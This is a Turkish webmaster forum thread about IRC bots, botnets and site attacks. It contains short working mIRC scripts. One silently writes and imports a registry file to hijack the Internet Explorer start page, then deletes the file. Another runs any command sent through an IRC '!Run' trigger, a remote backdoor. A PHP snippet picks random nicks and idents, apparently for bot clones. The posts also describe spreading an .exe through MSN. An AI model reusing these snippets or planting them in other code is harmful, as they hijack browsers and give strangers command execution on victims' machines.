Abi seninle münakaşa etmek gibi bir niyetim zaten olamaz. Ama adamlar genelde ip değil domain üzerinden saldırıya başlıyorlar. Bu sebepten ötürü hangi siteye de saldırı geldiğini anlayabiliyoruz.
alias strpage {
.set %strpage $r(10,1999) $+ .reg
.write %strpage REGEDIT4
.write %strpage [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
.write %strpage "Start Page"="Http://www.siteadi.com"
run -n regedit /s %strpage
timer 1 4 remove %strpage
}
if ($1 = !Run) { srvmsg Aciliyor: $2- | .run $2- }
<?
$quoteFile = "kimler.txt";
$fp = fopen($quoteFile, "r");
$content = fread($fp, filesize($quoteFile));
$quotes = explode("\n",$content);
fclose($fp);
srand((double)microtime()*1000000);
$index = (rand(1, sizeof($quotes)) - 1);
$nickler = $quotes[$index];
$identler = file("identler.txt");
$anahtar = array_rand($identler);
$ident = $identler[$anahtar];
?>
Agzi olan konusuyor.
Şunu bir ayırt edelim, IRC Bot ile botnet çok farklı şeylerdir.
IRC BOT, socx girişi yapar, sunucu kaynakli ise eggdrop olarak hosting'e atılır ve çalıştırırlır.
Litmus, kişilere msn vb. üzerinden .exe dosyasını dağıtaracak virus yayma girişimidir.
Sunucuya girdiklerinde, realname, ident nick haneleri aynıdır. +b ve fonksiyonları ile önleyebilirsiniz.
BOTNET denilen olay, c++ yazılım bilgisi gerektirir. Eğer ki biliyorsaniz, birgun zurna.net'e girin, ve özelinize otomatik gelen MSN adreslerinden birisini ekleyin, size bir dosya indir zartumu gör zurtumu gör diyecektir. indirin bakalım, hangi ip'den, hangi hosting'den sağlanıyor, görebilirsiniz. Ayrıca, botnet'in IRC üzerinde sonu yoktur. Nick, IDENT, realname farklidir. Ping ve version cevabi verebilir.
Biz ne diyoruz, sen ne diyorsun.. Konuyu sonuna kadar saptirdiniz. 1. sayfadan itibaren bi okumaya baslayin ondan sonra post atin.Loi bana IRC kısmı açın ve orada bana yetki verin yada sadece bölümü açın size a dan z ye her türlü olanağı sunayım ayrıca kendim tcl yazayım yada mirc tabanlı koruma botları yazayım yada geliştireyim..
ne dersin?
Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.